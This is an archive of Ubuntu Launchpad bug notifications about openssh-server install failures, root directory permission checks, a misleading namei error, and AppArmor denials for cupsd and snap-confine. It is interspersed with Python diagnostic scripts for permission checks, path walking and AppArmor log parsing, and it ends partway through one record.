https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1797386/+subscriptions



[Touch-packages] [Bug 1818679] Re: package openssh-server 1:7.2p2-4ubuntu2.8 failed to install/upgrade: le sous-processus script post-installation installé a retourné une erreur de sortie d'état 1

2019-03-05 Thread Seth Arnold
Hello, can you please run this command and report back the results?

ls -ld /

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1818679

Title:
  package openssh-server 1:7.2p2-4ubuntu2.8 failed to install/upgrade:
  le sous-processus script post-installation installé a retourné une
  erreur de sortie d'état 1

Status in openssh package in Ubuntu:
  New

Bug description:
  I can't tell you anything. There was a error message without specific
  details.

  ProblemType: Package
  DistroRelease: Ubuntu 16.04
  Package: openssh-server 1:7.2p2-4ubuntu2.8
  ProcVersionSignature: Ubuntu 4.4.0-142.168-generic 4.4.167
  Uname: Linux 4.4.0-142-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2.18
  Architecture: amd64
  Date: Tue Mar  5 06:48:59 2019
  ErrorMessage: le sous-processus script post-installation installé a retourné 
une erreur de sortie d'état 1
  InstallationDate: Installed on 2016-08-12 (935 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 
(20160420.1)
  RelatedPackageVersions:
   dpkg 1.18.4ubuntu1.5
   apt  1.2.29ubuntu0.1
  SSHDConfig: Error: command ['/usr/sbin/sshd', '-T'] failed with exit code 
255: Missing privilege separation directory: /var/run/sshd
  SourcePackage: openssh
  Title: package openssh-server 1:7.2p2-4ubuntu2.8 failed to install/upgrade: 
le sous-processus script post-installation installé a retourné une erreur de 
sortie d'état 1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1818679/+subscriptions



[Touch-packages] [Bug 1818691] Re: package openssh-server 1:7.2p2-4ubuntu2.8 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1

2019-03-05 Thread Seth Arnold
Hello, can you please run this command and report back the results?

ls -ld /

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1818691

Title:
  package openssh-server 1:7.2p2-4ubuntu2.8 failed to install/upgrade:
  subprocess installed post-installation script returned error exit
  status 1

Status in openssh package in Ubuntu:
  New

Bug description:
  .

  ProblemType: Package
  DistroRelease: Ubuntu 16.04
  Package: openssh-server 1:7.2p2-4ubuntu2.8
  ProcVersionSignature: Ubuntu 4.15.0-45.48~16.04.1-generic 4.15.18
  Uname: Linux 4.15.0-45-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2.18
  Architecture: amd64
  Date: Tue Mar  5 15:29:31 2019
  ErrorMessage: subprocess installed post-installation script returned error 
exit status 1
  InstallationDate: Installed on 2019-01-21 (43 days ago)
  InstallationMedia: Ubuntu 16.04.5 LTS "Xenial Xerus" - Release amd64 
(20180731)
  RelatedPackageVersions:
   dpkg 1.18.4ubuntu1.5
   apt  1.2.29ubuntu0.1
  SSHDConfig: Error: command ['/usr/sbin/sshd', '-T'] failed with exit code 
255: Missing privilege separation directory: /var/run/sshd
  SourcePackage: openssh
  Title: package openssh-server 1:7.2p2-4ubuntu2.8 failed to install/upgrade: 
subprocess installed post-installation script returned error exit status 1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1818691/+subscriptions



[Touch-packages] [Bug 1818564] [NEW] directory permission sanity checks

2019-03-04 Thread Seth Arnold
Public bug reported:

Hello, we've received a surprising number of bug reports that include
lines from ufw's sanity checks saying that / permissions are incorrect;
it's been a recurring feature of systemd-tmpfiles bug reports as well.

I think apport should include a similar report if / /etc /lib /usr /tmp
etc have incorrect user, group, or permissions.

Thanks

** Affects: apport (Ubuntu)
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1818564

Title:
  directory permission sanity checks

Status in apport package in Ubuntu:
  New

Bug description:
  Hello, we've received a surprising number of bug reports that include
  lines from ufw's sanity checks saying that / permissions are incorrect;
  it's been a recurring feature of systemd-tmpfiles bug reports as well.

  I think apport should include a similar report if / /etc /lib /usr
  /tmp etc have incorrect user, group, or permissions.

  Thanks

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1818564/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
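
A sketch of the kind of check proposed in the report above, as an added example; it is not apport's or ufw's code. The baseline owner, group and mode values are assumptions for a stock Ubuntu layout, and `EXPECTED`, `check_dir` and `check_dirs` are hypothetical names.

```python
import os
import stat

# Assumed baseline (not taken from apport or ufw):
# path -> (owner uid, group gid, permission bits incl. sticky/setuid/setgid)
EXPECTED = {
    "/": (0, 0, 0o755),
    "/etc": (0, 0, 0o755),
    "/lib": (0, 0, 0o755),   # os.stat follows the usr-merge symlink
    "/usr": (0, 0, 0o755),
    "/tmp": (0, 0, 0o1777),  # world-writable, but with the sticky bit
}


def check_dir(path, uid, gid, mode, stat_fn=os.stat):
    """Return a list of problem strings for one directory (empty if fine).

    stat_fn is injectable so the check can be exercised without touching
    the real filesystem.
    """
    try:
        st = stat_fn(path)
    except OSError as exc:
        return ["%s: cannot stat: %s" % (path, exc.strerror or exc)]
    if not stat.S_ISDIR(st.st_mode):
        return ["%s: not a directory" % path]

    problems = []
    if st.st_uid != uid:
        problems.append("%s: owner uid %d, expected %d" % (path, st.st_uid, uid))
    if st.st_gid != gid:
        problems.append("%s: group gid %d, expected %d" % (path, st.st_gid, gid))

    actual = stat.S_IMODE(st.st_mode)
    if actual != mode:
        problems.append("%s: mode %04o, expected %04o" % (path, actual, mode))
    # Call out the case that lets any local user replace entries in the
    # directory: writable by "other" with no sticky bit to restrict renames.
    if actual & stat.S_IWOTH and not actual & stat.S_ISVTX:
        problems.append("%s: world-writable without the sticky bit" % path)
    return problems


def check_dirs(expected=EXPECTED, stat_fn=os.stat):
    """Run check_dir over every baseline entry and collect all problems."""
    report = []
    for path, (uid, gid, mode) in sorted(expected.items()):
        report.extend(check_dir(path, uid, gid, mode, stat_fn))
    return report


if __name__ == "__main__":
    for line in check_dirs() or ["all checked directories match the baseline"]:
        print(line)
```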


[Touch-packages] [Bug 1818548] [NEW] namei -l incorrect error message

2019-03-04 Thread Seth Arnold
Public bug reported:

Hello, namei -l gives incorrect error messages if a directory is not
readable:

$ namei -l /etc/ssl/private/ssl-cert-snakeoil.key
f: /etc/ssl/private/ssl-cert-snakeoil.key
drwxr-xr-x root root /
drwxr-xr-x root root etc
drwxr-xr-x root root ssl
drwx--x--- root ssl-cert private
 ssl-cert-snakeoil.key - No such file or directory
$ cat /etc/ssl/private/ssl-cert-snakeoil.key
cat: /etc/ssl/private/ssl-cert-snakeoil.key: Permission denied
$ ls -l /etc/ssl/private/
ls: cannot open directory '/etc/ssl/private/': Permission denied


"No such file or directory" is a poor error message for this case. The correct 
error message (as shown by cat) is "Permission denied".

Incorrect error messages make this tool much less useful.

Thanks

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: util-linux 2.31.1-0.4ubuntu3.3
ProcVersionSignature: Ubuntu 4.15.0-45.48-generic 4.15.18
Uname: Linux 4.15.0-45-generic x86_64
NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
ApportVersion: 2.20.9-0ubuntu7.5
Architecture: amd64
Date: Mon Mar  4 09:00:12 2019
InstallationDate: Installed on 2012-10-18 (2328 days ago)
InstallationMedia: Ubuntu 12.04.1 LTS "Precise Pangolin" - Release amd64 
(20120823.1)
ProcEnviron:
 TERM=rxvt-unicode-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: util-linux
UpgradeStatus: Upgraded to bionic on 2018-05-02 (306 days ago)

** Affects: util-linux (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: amd64 apport-bug bionic

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to util-linux in Ubuntu.
https://bugs.launchpad.net/bugs/1818548

Title:
  namei -l incorrect error message

Status in util-linux package in Ubuntu:
  New

Bug description:
  Hello, namei -l gives incorrect error messages if a directory is not
  readable:

  $ namei -l /etc/ssl/private/ssl-cert-snakeoil.key
  f: /etc/ssl/private/ssl-cert-snakeoil.key
  drwxr-xr-x root root /
  drwxr-xr-x root root etc
  drwxr-xr-x root root ssl
  drwx--x--- root ssl-cert private
   ssl-cert-snakeoil.key - No such file or directory
  $ cat /etc/ssl/private/ssl-cert-snakeoil.key
  cat: /etc/ssl/private/ssl-cert-snakeoil.key: Permission denied
  $ ls -l /etc/ssl/private/
  ls: cannot open directory '/etc/ssl/private/': Permission denied

  
  "No such file or directory" is a poor error message for this case. The 
correct error message (as shown by cat) is "Permission denied".

  Incorrect error messages make this tool much less useful.

  Thanks

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: util-linux 2.31.1-0.4ubuntu3.3
  ProcVersionSignature: Ubuntu 4.15.0-45.48-generic 4.15.18
  Uname: Linux 4.15.0-45-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.9-0ubuntu7.5
  Architecture: amd64
  Date: Mon Mar  4 09:00:12 2019
  InstallationDate: Installed on 2012-10-18 (2328 days ago)
  InstallationMedia: Ubuntu 12.04.1 LTS "Precise Pangolin" - Release amd64 
(20120823.1)
  ProcEnviron:
   TERM=rxvt-unicode-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: util-linux
  UpgradeStatus: Upgraded to bionic on 2018-05-02 (306 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/util-linux/+bug/1818548/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
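
The behaviour the report above asks for, as an added example that is not util-linux code: a component-by-component walk that keeps the errno the kernel actually returned instead of collapsing every failure into "No such file or directory". `walk_path` and `render` are hypothetical names; unlike namei, this sketch does not print symlink targets.

```python
import errno
import os
import stat


def walk_path(path, lstat=os.lstat):
    """Walk an absolute path one component at a time, namei -l style.

    Returns a list of (component, mode_string, uid, gid, error) tuples.
    error is None on success, otherwise the name of the errno the kernel
    returned; the walk stops at the first failure. lstat is injectable so
    the logic can be tested without special directory permissions.
    """
    if not path.startswith("/"):
        raise ValueError("absolute path required")

    steps = [("/", "/")]
    current = "/"
    for part in (p for p in path.split("/") if p):
        current = os.path.join(current, part)
        steps.append((part, current))

    rows = []
    for name, full in steps:
        try:
            st = lstat(full)
        except OSError as exc:
            # Looking up an entry needs search (x) permission on its parent.
            # Without it the kernel answers EACCES, which is a different
            # fact from ENOENT and must be reported as such.
            rows.append((name, None, None, None,
                         errno.errorcode.get(exc.errno, "errno %s" % exc.errno)))
            break
        rows.append((name, stat.filemode(st.st_mode), st.st_uid, st.st_gid, None))
    return rows


def render(rows):
    """Format walk_path() rows as text lines, one per component."""
    lines = []
    for name, mode, uid, gid, error in rows:
        if error is None:
            lines.append("%s %d %d %s" % (mode, uid, gid, name))
        else:
            code = getattr(errno, error, None)
            reason = os.strerror(code) if code is not None else error
            lines.append("           %s - %s (%s)" % (name, reason, error))
    return lines


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "/etc/ssl/private/ssl-cert-snakeoil.key"
    print("\n".join(render(walk_path(target))))
```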


Re: [Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

2019-02-27 Thread Seth Arnold
On Thu, Feb 28, 2019 at 04:08:09AM -, Edson José dos Santos wrote:
> edson@edson-p6540br:~$ dmesg | grep DENIED
> [   58.334359] audit: type=1400 audit(1551326278.953:59): apparmor="DENIED" 
> operation="open" profile="/usr/lib/snapd/snap-confine" 
> name="/opt/eset/esets/lib/libesets_pac.so" pid=1109 comm="snap-confine" 
> requested_mask="r" denied_mask="r" fsuid=0 ouid=0

Excellent, much better!

Now we just need our snapd friends to tell us the proper way an admin
can add rules to the snap-confine profile.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

Status in apparmor package in Ubuntu:
  New
Status in snapd package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: 
/etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic 
root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvr8DET56WW(1.26):bd12/01/2011:svnLENOVO:pn4298R86:pvrThinkPadX220Tablet:rvnLENOVO:rn4298R86:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 4298R86
  dmi.product.version: ThinkPad X220 Tablet
  dmi.sys.vendor: LENOVO
  modified.conffile..etc.default.cups:
   # Cups configure options
   
   # LOAD_LP_MODULE: enable/disable to load "lp" parallel printer driver module
   # LOAD_LP_MODULE has migrated to /etc/modules-load.d/cups-filters.conf
   # LOAD_LP_MODULE=yes
  mtime.conffile..etc.default.cups: 2014-03-12T15:11:15.740184

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1571531/+subscriptions


Re: [Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

2019-02-27 Thread Seth Arnold
On Thu, Feb 28, 2019 at 03:04:00AM -, Edson José dos Santos wrote:
> Hello Arnold

>   unix, (connect, send, receive) peer =
> (addr="@2F746D702F65736574732E736F636B00*"),

Excellent, here's the mistake. Remove everything after the comma:

  unix,

Then try the reboot again.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

Status in apparmor package in Ubuntu:
  New
Status in snapd package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 5081.446507] audit: type=1400 audit(1460963160.069:68): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10815 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: cups-daemon 2.1.3-4
  ProcVersionSignature: Ubuntu 4.4.0-18.34-generic 4.4.6
  Uname: Linux 4.4.0-18-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  CupsErrorLog:
   
  CurrentDesktop: X-Cinnamon
  Date: Mon Apr 18 10:56:37 2016
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2013-07-19 (1003 days ago)
  InstallationMedia: Xubuntu 13.04 "Raring Ringtail" - Release i386 (20130423.1)
  Lpstat: device for Generic-PCL-5e: socket://192.168.1.100:9100
  MachineType: LENOVO 4298R86
  Papersize: a4
  PpdFiles: Error: command ['fgrep', '-H', '*NickName', 
'/etc/cups/ppd/Generic-PCL-5e.ppd'] failed with exit code 2: grep: 
/etc/cups/ppd/Generic-PCL-5e.ppd: Permission denied
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-18-generic 
root=UUID=3d4ce850-6e8a-4cf5-9b82-fb135c22fe1e ro
  SourcePackage: cups
  UpgradeStatus: Upgraded to xenial on 2015-10-29 (171 days ago)
  dmi.bios.date: 12/01/2011
  dmi.bios.vendor: LENOVO
  dmi.bios.version: 8DET56WW (1.26 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 4298R86
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Available
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvr8DET56WW(1.26):bd12/01/2011:svnLENOVO:pn4298R86:pvrThinkPadX220Tablet:rvnLENOVO:rn4298R86:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 4298R86
  dmi.product.version: ThinkPad X220 Tablet
  dmi.sys.vendor: LENOVO
  modified.conffile..etc.default.cups:
   # Cups configure options
   
   # LOAD_LP_MODULE: enable/disable to load "lp" parallel printer driver module
   # LOAD_LP_MODULE has migrated to /etc/modules-load.d/cups-filters.conf
   # LOAD_LP_MODULE=yes
  mtime.conffile..etc.default.cups: 2014-03-12T15:11:15.740184

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1571531/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
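
Added example (not part of the original bug report or thread): a triage script that groups the AppArmor denial records from the bug description by profile, path and mask, and decodes the hex peer address from the `unix` rule quoted elsewhere in this thread. The function names are my own, and the hex decoding assumes the address is plain hex-encoded bytes, as the string on the page suggests.

```python
import re
from collections import defaultdict

# Four denial records copied from the bug description (the archive's line
# wrapping is joined back to one record per line), plus one constructed,
# unrelated kernel line to show that non-AppArmor lines are skipped.
SAMPLE_DMESG = """\
[ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
[ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
[ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
[ 5081.410342] audit: type=1400 audit(1460963160.033:67): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10810 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
[ 5081.500000] usb 1-1: new high-speed USB device number 5 using xhci_hcd
"""

# Matches key="quoted value" or key=bare_token.
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
# String fields that the audit subsystem logs unquoted and hex-encoded
# when they contain spaces or other unsafe bytes.
STRING_FIELDS = {"name", "comm", "profile"}


def decode_value(key, raw):
    """Strip quotes, or hex-decode an unquoted string field."""
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1]
    if (key in STRING_FIELDS and len(raw) % 2 == 0
            and re.fullmatch(r"[0-9A-Fa-f]+", raw)):
        return bytes.fromhex(raw).decode("utf-8", "replace")
    return raw


def parse_denials(text):
    """Return one dict per AppArmor DENIED record found in the text."""
    records = []
    for line in text.splitlines():
        fields = {k: decode_value(k, v) for k, v in FIELD_RE.findall(line)}
        if fields.get("apparmor") == "DENIED":
            records.append(fields)
    return records


def summarize(records):
    """Group denials by (profile, operation, name, denied_mask)."""
    groups = defaultdict(lambda: {"count": 0, "comms": set(), "fsuids": set()})
    for rec in records:
        key = (rec.get("profile"), rec.get("operation"),
               rec.get("name"), rec.get("denied_mask"))
        group = groups[key]
        group["count"] += 1
        group["comms"].add(rec.get("comm"))
        group["fsuids"].add(rec.get("fsuid"))
    return {
        key: {"count": g["count"],
              "comms": sorted(g["comms"]),
              "fsuids": sorted(g["fsuids"])}
        for key, g in groups.items()
    }


def candidate_file_rule(key):
    """Narrowest file rule covering one group: this path, this mask only.

    The output is a line for a human to review, not something to apply blindly.
    """
    _profile, _operation, name, mask = key
    if not name or not name.startswith("/"):
        return None
    return f"{name} {mask},"


def decode_abstract_addr(pattern):
    """Decode the hex body of a rule address such as "@2F74...00*".

    The leading "@" (abstract socket) and trailing "*" (glob) are removed;
    whitespace introduced by mail wrapping is ignored by bytes.fromhex().
    """
    body = pattern.strip().lstrip("@").rstrip("*")
    return bytes.fromhex(body)


if __name__ == "__main__":
    summary = summarize(parse_denials(SAMPLE_DMESG))
    for key, info in summary.items():
        print(key, info, "->", candidate_file_rule(key))
    print(decode_abstract_addr("@2F746D702F65736574732E736F636B00*"))
```

The address in the rule decodes to `/tmp/esets.sock` followed by a NUL byte, and every sample denial collapses into a single group for `/etc/ld.so.preload` under the `/usr/sbin/cupsd` profile.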


Re: [Touch-packages] [Bug 1571531] Re: cupsd cause apparmor denials for /etc/ld.so.preload

2019-02-27 Thread Seth Arnold
On Wed, Feb 27, 2019 at 12:59:14PM -, Edson José dos Santos wrote:
> Hi, Arnold
> 
> At startup the error message is appearing in apparmor and I would like
> to know how to generate a log to introduce them to you or just the boot
> log. In the absence of this I got this other log, where it points
> several flaws.

> Feb 27 09:37:29 edson-p6540br systemd-tmpfiles[482]: 
> [/usr/lib/tmpfiles.d/spice-vdagentd.conf:2] Line references path below legacy 
> directory /var/run/, updating /var/run/spice-vdagentd → /run/spice-vdagentd; 
> please update the tmpfiles.d/ drop-in file accordingly.
> Feb 27 09:37:29 edson-p6540br apparmor[376]: Erro do analisador AppArmor para 
> /etc/apparmor.d/usr.bin.man in /etc/apparmor.d/abstractions/base na linha 
> 168: syntax error, unexpected TOK_OPENPAREN, expecting TOK_ID or TOK_MODE or 
> TOK_SET_VAR
> Feb 27 09:37:29 edson-p6540br apparmor[376]: Erro do analisador AppArmor para 
> /etc/apparmor.d/sbin.dhclient in /etc/apparmor.d/abstractions/base na linha 
> 168: syntax error, unexpected TOK_OPENPAREN, expecting TOK_ID or TOK_MODE or 
> TOK_SET_VAR

Hello Edson, this means there's an error, probably in
/etc/apparmor.d/abstractions/base , and probably it is near the end.

Can you paste the last ten or twenty lines of that file?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1571531

Title:
  cupsd cause apparmor denials for /etc/ld.so.preload

Status in apparmor package in Ubuntu:
  New
Status in snapd package in Ubuntu:
  New

Bug description:
  There is a constant flood of messages in dmesg:

  [ 4431.638163] audit: type=1400 audit(1460962510.272:60): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10559 
comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661208] audit: type=1400 audit(1460962510.296:61): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661390] audit: type=1400 audit(1460962510.296:62): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661759] audit: type=1400 audit(1460962510.296:63): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10564 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.661936] audit: type=1400 audit(1460962510.296:64): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
comm="cups-exec" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 4431.661937] audit: type=1400 audit(1460962510.296:65): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10565 
comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0
  [ 4431.662534] audit: type=1400 audit(1460962510.296:66): apparmor="DENIED" 
operation="open" profile="/usr/sbin/cupsd" name="/etc/ld.so.preload" pid=10566 
